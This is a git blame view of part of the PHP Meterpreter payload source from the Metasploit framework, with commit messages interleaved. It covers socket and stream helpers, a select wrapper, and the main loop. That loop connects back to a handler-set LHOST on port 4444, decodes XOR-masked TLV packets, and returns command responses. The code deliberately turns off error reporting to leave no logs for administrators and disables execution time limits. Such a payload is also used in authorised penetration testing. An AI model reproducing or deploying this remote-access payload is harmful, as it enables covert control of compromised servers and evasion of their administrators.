2011-06-30 12:28:04 +02:00
|
|
|
global $resource_type_map, $udp_host_map;
|
2010-07-14 00:51:15 +02:00
|
|
|
|
2010-06-13 18:44:22 +02:00
|
|
|
remove_reader($resource);
|
2010-06-08 09:59:36 +02:00
|
|
|
switch (get_rtype($resource)) {
|
2010-07-14 00:51:15 +02:00
|
|
|
case 'socket': $ret = socket_close($resource); break;
|
|
|
|
case 'stream': $ret = fclose($resource); break;
|
2010-06-13 18:44:22 +02:00
|
|
|
}
|
|
|
|
# Every resource should be in the resource type map, but check anyway
|
|
|
|
if (array_key_exists((int)$resource, $resource_type_map)) {
|
|
|
|
unset($resource_type_map[(int)$resource]);
|
2010-06-08 09:59:36 +02:00
|
|
|
}
|
2010-07-14 00:51:15 +02:00
|
|
|
if (array_key_exists((int)$resource, $udp_host_map)) {
|
|
|
|
my_print("Removing $resource from udp_host_map");
|
|
|
|
unset($udp_host_map[(int)$resource]);
|
|
|
|
}
|
|
|
|
return $ret;
|
2010-06-08 09:59:36 +02:00
|
|
|
}
|
|
|
|
|
2010-06-13 18:44:22 +02:00
|
|
|
function read($resource, $len=null) {
|
2010-07-14 00:51:15 +02:00
|
|
|
global $udp_host_map;
|
2010-06-13 18:44:22 +02:00
|
|
|
# Max packet length is magic. If we're reading a pipe that has data but
|
|
|
|
# isn't going to generate any more without some input, then reading less
|
|
|
|
# than all bytes in the buffer or 8192 bytes, the next read will never
|
|
|
|
# return.
|
|
|
|
if (is_null($len)) { $len = 8192; }
|
2010-09-05 22:54:32 +02:00
|
|
|
#my_print(sprintf("Reading from $resource which is a %s", get_rtype($resource)));
|
2010-06-13 18:44:22 +02:00
|
|
|
$buff = '';
|
2010-06-08 09:59:36 +02:00
|
|
|
switch (get_rtype($resource)) {
|
2013-04-26 22:12:37 +02:00
|
|
|
case 'socket':
|
2010-07-14 00:51:15 +02:00
|
|
|
if (array_key_exists((int)$resource, $udp_host_map)) {
|
|
|
|
my_print("Reading UDP socket");
|
|
|
|
list($host,$port) = $udp_host_map[(int)$resource];
|
|
|
|
socket_recvfrom($resource, $buff, $len, PHP_BINARY_READ, $host, $port);
|
|
|
|
} else {
|
2011-02-18 01:24:18 +01:00
|
|
|
my_print("Reading TCP socket");
|
2011-06-30 12:28:04 +02:00
|
|
|
$buff .= socket_read($resource, $len, PHP_BINARY_READ);
|
2010-07-14 00:51:15 +02:00
|
|
|
}
|
|
|
|
break;
|
2011-02-18 01:24:18 +01:00
|
|
|
case 'stream':
|
2011-06-30 12:28:04 +02:00
|
|
|
global $msgsock;
|
|
|
|
# Calling select here should ensure that we never try to read from a socket
|
|
|
|
# or pipe that doesn't currently have data. If that ever happens, the
|
|
|
|
# whole php process will block waiting for data that may never come.
|
|
|
|
# Unfortunately, selecting on pipes created with proc_open on Windows
|
|
|
|
# always returns immediately. Basically, shell interaction in Windows
|
2014-12-20 00:25:56 +01:00
|
|
|
# is hosed until this gets figured out.
|
2015-08-28 16:38:26 +02:00
|
|
|
#
|
|
|
|
# From the documentation:
|
|
|
|
# > Use of stream_select() on file descriptors returned by proc_open()
|
|
|
|
# will fail and return FALSE under Windows.
|
2011-06-30 12:28:04 +02:00
|
|
|
$r = Array($resource);
|
|
|
|
my_print("Calling select to see if there's data on $resource");
|
|
|
|
while (true) {
|
2014-07-03 22:58:05 +02:00
|
|
|
$w=NULL;$e=NULL;$t=0;
|
|
|
|
$cnt = stream_select($r, $w, $e, $t);
|
2011-06-30 12:28:04 +02:00
|
|
|
|
|
|
|
# Stream is not ready to read, have to live with what we've gotten
|
|
|
|
# so far
|
|
|
|
if ($cnt === 0) {
|
|
|
|
break;
|
|
|
|
}
|
|
|
|
|
|
|
|
# if stream_select returned false, something is wrong with the
|
|
|
|
# socket or the syscall was interrupted or something.
|
|
|
|
if ($cnt === false or feof($resource)) {
|
|
|
|
my_print("Checking for failed read...");
|
|
|
|
if (empty($buff)) {
|
|
|
|
my_print("---- EOF ON $resource ----");
|
|
|
|
$buff = false;
|
|
|
|
}
|
|
|
|
break;
|
|
|
|
}
|
|
|
|
|
|
|
|
$md = stream_get_meta_data($resource);
|
2015-08-28 16:38:26 +02:00
|
|
|
dump_array($md, "Metadata for {$resource}");
|
2011-06-30 12:28:04 +02:00
|
|
|
if ($md['unread_bytes'] > 0) {
|
|
|
|
$buff .= fread($resource, $md['unread_bytes']);
|
|
|
|
break;
|
|
|
|
} else {
|
|
|
|
#$len = 1;
|
|
|
|
$tmp = fread($resource, $len);
|
|
|
|
$buff .= $tmp;
|
|
|
|
if (strlen($tmp) < $len) {
|
|
|
|
break;
|
|
|
|
}
|
|
|
|
}
|
2013-04-26 22:12:37 +02:00
|
|
|
|
2011-06-30 12:28:04 +02:00
|
|
|
if ($resource != $msgsock) { my_print("buff: '$buff'"); }
|
|
|
|
$r = Array($resource);
|
|
|
|
}
|
|
|
|
my_print(sprintf("Done with the big read loop on $resource, got %d bytes", strlen($buff)));
|
2011-02-18 01:24:18 +01:00
|
|
|
break;
|
2013-04-26 22:12:37 +02:00
|
|
|
default:
|
2011-06-30 12:28:04 +02:00
|
|
|
# then this is possibly a closed channel resource, see if we have any
|
|
|
|
# data from previous reads
|
|
|
|
$cid = get_channel_id_from_resource($resource);
|
|
|
|
$c = get_channel_by_id($cid);
|
|
|
|
if ($c and $c['data']) {
|
|
|
|
$buff = substr($c['data'], 0, $len);
|
|
|
|
$c['data'] = substr($c['data'], $len);
|
|
|
|
my_print("Aha! got some leftovers");
|
|
|
|
} else {
|
|
|
|
my_print("Wtf don't know how to read from resource $resource, c: $c");
|
|
|
|
if (is_array($c)) {
|
|
|
|
dump_array($c);
|
|
|
|
}
|
|
|
|
break;
|
|
|
|
}
|
2010-06-08 09:59:36 +02:00
|
|
|
}
|
2011-06-30 12:28:04 +02:00
|
|
|
my_print(sprintf("Read %d bytes", strlen($buff)));
|
2010-06-08 09:59:36 +02:00
|
|
|
return $buff;
|
|
|
|
}
|
|
|
|
|
|
|
|
function write($resource, $buff, $len=0) {
|
2010-07-14 00:51:15 +02:00
|
|
|
global $udp_host_map;
|
2010-06-08 09:59:36 +02:00
|
|
|
if ($len == 0) { $len = strlen($buff); }
|
2010-09-05 22:54:32 +02:00
|
|
|
#my_print(sprintf("Writing $len bytes to $resource which is a %s", get_rtype($resource)));
|
2010-06-13 18:44:22 +02:00
|
|
|
$count = false;
|
2010-06-08 09:59:36 +02:00
|
|
|
switch (get_rtype($resource)) {
|
2013-04-26 22:12:37 +02:00
|
|
|
case 'socket':
|
2010-07-14 00:51:15 +02:00
|
|
|
if (array_key_exists((int)$resource, $udp_host_map)) {
|
|
|
|
my_print("Writing UDP socket");
|
|
|
|
list($host,$port) = $udp_host_map[(int)$resource];
|
|
|
|
$count = socket_sendto($resource, $buff, $len, $host, $port);
|
|
|
|
} else {
|
|
|
|
$count = socket_write($resource, $buff, $len);
|
|
|
|
}
|
|
|
|
break;
|
2013-04-26 22:12:37 +02:00
|
|
|
case 'stream':
|
2011-06-30 12:28:04 +02:00
|
|
|
$count = fwrite($resource, $buff, $len);
|
|
|
|
fflush($resource);
|
|
|
|
break;
|
2010-06-13 18:44:22 +02:00
|
|
|
default: my_print("Wtf don't know how to write to resource $resource"); break;
|
2010-06-08 09:59:36 +02:00
|
|
|
}
|
|
|
|
return $count;
|
|
|
|
}
|
|
|
|
|
|
|
|
function get_rtype($resource) {
|
|
|
|
global $resource_type_map;
|
2010-06-13 18:44:22 +02:00
|
|
|
if (array_key_exists((int)$resource, $resource_type_map)) {
|
|
|
|
return $resource_type_map[(int)$resource];
|
|
|
|
}
|
|
|
|
return false;
|
2010-06-08 09:59:36 +02:00
|
|
|
}
|
|
|
|
|
|
|
|
function select(&$r, &$w, &$e, $tv_sec=0, $tv_usec=0) {
|
|
|
|
$streams_r = array();
|
|
|
|
$streams_w = array();
|
|
|
|
$streams_e = array();
|
|
|
|
|
|
|
|
$sockets_r = array();
|
|
|
|
$sockets_w = array();
|
|
|
|
$sockets_e = array();
|
|
|
|
|
|
|
|
if ($r) {
|
|
|
|
foreach ($r as $resource) {
|
|
|
|
switch (get_rtype($resource)) {
|
2010-06-24 00:38:01 +02:00
|
|
|
case 'socket': $sockets_r[] = $resource; break;
|
|
|
|
case 'stream': $streams_r[] = $resource; break;
|
2010-06-08 09:59:36 +02:00
|
|
|
default: my_print("Unknown resource type"); break;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
}
|
|
|
|
if ($w) {
|
|
|
|
foreach ($w as $resource) {
|
|
|
|
switch (get_rtype($resource)) {
|
2010-06-24 00:38:01 +02:00
|
|
|
case 'socket': $sockets_w[] = $resource; break;
|
|
|
|
case 'stream': $streams_w[] = $resource; break;
|
2010-06-08 09:59:36 +02:00
|
|
|
default: my_print("Unknown resource type"); break;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
}
|
|
|
|
if ($e) {
|
|
|
|
foreach ($e as $resource) {
|
|
|
|
switch (get_rtype($resource)) {
|
2010-06-24 00:38:01 +02:00
|
|
|
case 'socket': $sockets_e[] = $resource; break;
|
|
|
|
case 'stream': $streams_e[] = $resource; break;
|
2010-06-08 09:59:36 +02:00
|
|
|
default: my_print("Unknown resource type"); break;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
$n_sockets = count($sockets_r) + count($sockets_w) + count($sockets_e);
|
|
|
|
$n_streams = count($streams_r) + count($streams_w) + count($streams_e);
|
2010-06-25 02:39:48 +02:00
|
|
|
#my_print("Selecting $n_sockets sockets and $n_streams streams with timeout $tv_sec.$tv_usec");
|
2010-06-08 09:59:36 +02:00
|
|
|
$r = array();
|
|
|
|
$w = array();
|
|
|
|
$e = array();
|
|
|
|
|
|
|
|
# Workaround for some versions of PHP that throw an error and bail out if
|
|
|
|
# select is given an empty array
|
2010-06-13 18:44:22 +02:00
|
|
|
if (count($sockets_r)==0) { $sockets_r = null; }
|
|
|
|
if (count($sockets_w)==0) { $sockets_w = null; }
|
|
|
|
if (count($sockets_e)==0) { $sockets_e = null; }
|
|
|
|
if (count($streams_r)==0) { $streams_r = null; }
|
|
|
|
if (count($streams_w)==0) { $streams_w = null; }
|
|
|
|
if (count($streams_e)==0) { $streams_e = null; }
|
2010-06-08 09:59:36 +02:00
|
|
|
|
|
|
|
$count = 0;
|
|
|
|
if ($n_sockets > 0) {
|
|
|
|
$res = socket_select($sockets_r, $sockets_w, $sockets_e, $tv_sec, $tv_usec);
|
2010-06-13 18:44:22 +02:00
|
|
|
if (false === $res) { return false; }
|
2010-06-08 09:59:36 +02:00
|
|
|
if (is_array($r) && is_array($sockets_r)) { $r = array_merge($r, $sockets_r); }
|
|
|
|
if (is_array($w) && is_array($sockets_w)) { $w = array_merge($w, $sockets_w); }
|
|
|
|
if (is_array($e) && is_array($sockets_e)) { $e = array_merge($e, $sockets_e); }
|
|
|
|
$count += $res;
|
|
|
|
}
|
|
|
|
if ($n_streams > 0) {
|
|
|
|
$res = stream_select($streams_r, $streams_w, $streams_e, $tv_sec, $tv_usec);
|
2010-06-13 18:44:22 +02:00
|
|
|
if (false === $res) { return false; }
|
2010-06-08 09:59:36 +02:00
|
|
|
if (is_array($r) && is_array($streams_r)) { $r = array_merge($r, $streams_r); }
|
|
|
|
if (is_array($w) && is_array($streams_w)) { $w = array_merge($w, $streams_w); }
|
|
|
|
if (is_array($e) && is_array($streams_e)) { $e = array_merge($e, $streams_e); }
|
|
|
|
$count += $res;
|
|
|
|
}
|
2010-06-25 02:39:48 +02:00
|
|
|
#my_print(sprintf("total: $count, Modified counts: r=%s w=%s e=%s", count($r), count($w), count($e)));
|
2010-06-08 09:59:36 +02:00
|
|
|
return $count;
|
|
|
|
}
|
|
|
|
|
2010-06-23 22:00:27 +02:00
|
|
|
function add_reader($resource) {
|
|
|
|
global $readers;
|
|
|
|
if (is_resource($resource) && !in_array($resource, $readers)) {
|
|
|
|
$readers[] = $resource;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
function remove_reader($resource) {
|
|
|
|
global $readers;
|
2011-02-18 01:24:18 +01:00
|
|
|
#my_print("Removing reader: $resource");
|
|
|
|
#dump_readers();
|
2010-06-23 22:00:27 +02:00
|
|
|
if (in_array($resource, $readers)) {
|
|
|
|
foreach ($readers as $key => $r) {
|
|
|
|
if ($r == $resource) {
|
|
|
|
unset($readers[$key]);
|
|
|
|
}
|
|
|
|
}
|
|
|
|
}
|
|
|
|
}
|
2010-06-08 09:59:36 +02:00
|
|
|
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
|
|
|
|
##
|
|
|
|
# Main stuff
|
|
|
|
##
|
|
|
|
|
|
|
|
ob_implicit_flush();
|
2010-06-08 09:59:36 +02:00
|
|
|
|
2011-01-10 09:04:17 +01:00
|
|
|
# For debugging
|
|
|
|
#error_reporting(E_ALL);
|
2010-06-08 09:59:36 +02:00
|
|
|
# Turn off error reporting so we don't leave any ugly logs. Why make an
|
|
|
|
# administrator's job easier if we don't have to? =)
|
2010-06-12 00:07:23 +02:00
|
|
|
error_reporting(0);
|
2010-06-08 09:59:36 +02:00
|
|
|
|
2010-06-03 00:43:03 +02:00
|
|
|
@ignore_user_abort(true);
|
|
|
|
# Has no effect in safe mode, but try anyway
|
|
|
|
@set_time_limit(0);
|
2011-02-18 01:24:18 +01:00
|
|
|
@ignore_user_abort(1);
|
|
|
|
@ini_set('max_execution_time',0);
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
|
2016-10-29 04:42:36 +02:00
|
|
|
# Add the payload UUID to globals, and use that from now on so that we can
|
|
|
|
# update it as required.
|
|
|
|
$GLOBALS['UUID'] = PAYLOAD_UUID;
|
2017-06-05 13:15:27 +02:00
|
|
|
$GLOBALS['SESSION_GUID'] = SESSION_GUID;
|
2010-06-12 00:07:23 +02:00
|
|
|
|
2010-06-23 22:00:27 +02:00
|
|
|
# If we don't have a socket we're standalone, setup the connection here.
|
|
|
|
# Otherwise, this is a staged payload, don't bother connecting
|
2010-07-27 23:16:15 +02:00
|
|
|
if (!isset($GLOBALS['msgsock'])) {
|
2010-06-12 00:07:23 +02:00
|
|
|
# The payload handler overwrites this with the correct LHOST before sending
|
|
|
|
# it to the victim.
|
2010-06-04 01:18:21 +02:00
|
|
|
$ipaddr = '127.0.0.1';
|
2010-06-23 22:00:27 +02:00
|
|
|
$port = 4444;
|
2010-07-27 23:16:15 +02:00
|
|
|
my_print("Don't have a msgsock, trying to connect($ipaddr, $port)");
|
2010-06-25 02:39:48 +02:00
|
|
|
$msgsock = connect($ipaddr, $port);
|
|
|
|
if (!$msgsock) { die(); }
|
|
|
|
} else {
|
2010-07-27 23:16:15 +02:00
|
|
|
# The ABI for PHP stagers is a socket in $msgsock and it's type (socket or
|
|
|
|
# stream) in $msgsock_type
|
|
|
|
$msgsock = $GLOBALS['msgsock'];
|
|
|
|
$msgsock_type = $GLOBALS['msgsock_type'];
|
2010-06-25 02:39:48 +02:00
|
|
|
switch ($msgsock_type) {
|
|
|
|
case 'socket':
|
|
|
|
register_socket($msgsock);
|
|
|
|
break;
|
2013-04-26 22:12:37 +02:00
|
|
|
case 'stream':
|
2010-06-25 02:39:48 +02:00
|
|
|
# fall through
|
|
|
|
default:
|
|
|
|
register_stream($msgsock);
|
2010-06-04 01:18:21 +02:00
|
|
|
}
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
}
|
2010-06-23 22:00:27 +02:00
|
|
|
add_reader($msgsock);
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
|
|
|
|
#
|
|
|
|
# Main dispatch loop
|
|
|
|
#
|
2010-06-24 00:38:01 +02:00
|
|
|
$r=$GLOBALS['readers'];
|
2014-07-03 22:58:05 +02:00
|
|
|
$w=NULL;$e=NULL;$t=1;
|
|
|
|
while (false !== ($cnt = select($r, $w, $e, $t))) {
|
2010-09-05 22:54:32 +02:00
|
|
|
#my_print(sprintf("Returned from select with %s readers", count($r)));
|
2010-06-03 02:24:55 +02:00
|
|
|
$read_failed = false;
|
2010-06-13 18:44:22 +02:00
|
|
|
for ($i = 0; $i < $cnt; $i++) {
|
2010-06-04 04:43:17 +02:00
|
|
|
$ready = $r[$i];
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
if ($ready == $msgsock) {
|
2017-06-26 08:48:01 +02:00
|
|
|
$packet = read($msgsock, 29);
|
2010-06-13 18:44:22 +02:00
|
|
|
#my_print(sprintf("Read returned %s bytes", strlen($request)));
|
2017-06-26 08:48:01 +02:00
|
|
|
if (false==$packet) {
|
|
|
|
my_print("Read failed on main socket, bailing");
|
2010-06-03 06:45:48 +02:00
|
|
|
# We failed on the main socket. There's no way to continue, so
|
|
|
|
# break all the way out.
|
2010-06-04 01:18:21 +02:00
|
|
|
break 2;
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
}
|
2017-06-26 08:48:01 +02:00
|
|
|
$xor = substr($packet, 0, 4);
|
|
|
|
$header = xor_bytes($xor, substr($packet, 4, 25));
|
|
|
|
$len_array = unpack("Nlen", substr($header, 17, 4));
|
|
|
|
# length of the packet should be the packet header size
|
|
|
|
# minus 8 for the tlv length + the required data length
|
|
|
|
$len = $len_array['len'] + 29 - 8;
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
# packet type should always be 0, i.e. PACKET_TYPE_REQUEST
|
2017-06-26 08:48:01 +02:00
|
|
|
while (strlen($packet) < $len) {
|
|
|
|
$packet .= read($msgsock, $len-strlen($packet));
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
}
|
2017-06-26 08:48:01 +02:00
|
|
|
$response = create_response(substr(xor_bytes($xor, $packet), 21));
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
|
2015-12-08 04:42:34 +01:00
|
|
|
write_tlv_to_socket($msgsock, $response);
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
} else {
|
2011-01-10 09:04:17 +01:00
|
|
|
#my_print("not Msgsock: $ready");
|
2010-06-13 18:44:22 +02:00
|
|
|
$data = read($ready);
|
2011-06-30 12:28:04 +02:00
|
|
|
if (false === $data) {
|
2011-02-18 01:24:18 +01:00
|
|
|
handle_dead_resource_channel($ready);
|
2011-06-30 12:28:04 +02:00
|
|
|
} elseif (strlen($data) > 0){
|
2011-02-18 01:24:18 +01:00
|
|
|
my_print(sprintf("Read returned %s bytes", strlen($data)));
|
2010-06-13 18:44:22 +02:00
|
|
|
$request = handle_resource_read_channel($ready, $data);
|
2011-06-30 12:28:04 +02:00
|
|
|
if ($request) {
|
2015-12-08 04:42:34 +01:00
|
|
|
write_tlv_to_socket($msgsock, $request);
|
2011-06-30 12:28:04 +02:00
|
|
|
}
|
2013-04-26 22:12:37 +02:00
|
|
|
}
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
}
|
|
|
|
}
|
2011-02-18 01:24:18 +01:00
|
|
|
# $r is modified by select, so reset it
|
2010-06-24 00:38:01 +02:00
|
|
|
$r = $GLOBALS['readers'];
|
2010-06-13 18:44:22 +02:00
|
|
|
} # end main loop
|
2010-06-03 00:43:03 +02:00
|
|
|
my_print("Finished");
|
2011-05-13 03:22:53 +02:00
|
|
|
my_print("--------------------");
|
2010-06-08 09:59:36 +02:00
|
|
|
close($msgsock);
|